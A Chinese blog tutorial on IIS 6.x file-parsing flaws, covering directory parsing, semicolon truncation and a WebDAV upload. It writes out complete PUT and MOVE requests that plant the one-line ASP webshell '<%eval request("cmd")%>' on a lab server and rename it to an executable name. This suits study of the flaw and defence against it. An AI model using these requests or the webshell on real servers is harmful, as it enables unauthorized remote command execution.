IIS解析漏洞~IIS6.X漏洞分析

在这里插入图片描述

类型代码量作用
一句话木马代码量极少配合webshell管理工具使用
小马代码量比小马多
大马代码量最多功能比较完善(执行命令,文件操作等)
图片马里面传有一句话木马

image-20240801114920202

文件解析漏洞是由于中间件错误的将特殊格式的文件解析成可执行网页文件(脚本),配合文件上传漏洞进行GetShell的漏洞!

一:IIS解析漏洞

1.1:IIS6.X

环境:windows server 2003

方式一:目录解析

在网站下建立文件夹的名字为 .asp/1.jpg 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。

image-20240801115309011

方式二:畸形文件解析

在IIS 6 处理文件解析时,分号可以起到截断的效果。也就是说 shell.asp;.jpg会被服务器看成是shell.asp。另外IIS6.0默认的可执行文件除了asp还包含 asa\cer

# 我们将大马整到虚拟机中,然后在给它命名为1.asp;.jpg

image-20240801115824664

方式三:PUT上传漏洞( 123.asp;.jpg 解析成asp )

IIS Server 在 Web 服务扩展中开启了 WebDAV ,配置了可以写入的权限,造成任意文件上传

image-20240801120006571

第一步:OPTIONS探测支持的方法

image-20240801184925060

第二步:PUT 一个webshell

PUT /123.txt HTTP/1.1
Host: 192.168.0.180
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/108.0.5359.95 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,i
mage/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 23
<%eval request("cmd")%>

image-20240801185949167

第三步:重命名该文件

MOVE /123.txt HTTP/1.1
Host: 192.168.0.180
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/108.0.5359.95 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,i
mage/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Destination: http://192.168.0.180/123.asp;.jpg
Connection: close
Content-Length: 0

image-20240801190032911

第四步:验证

image-20240801190052629
好小子,离成功又近一步!!!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值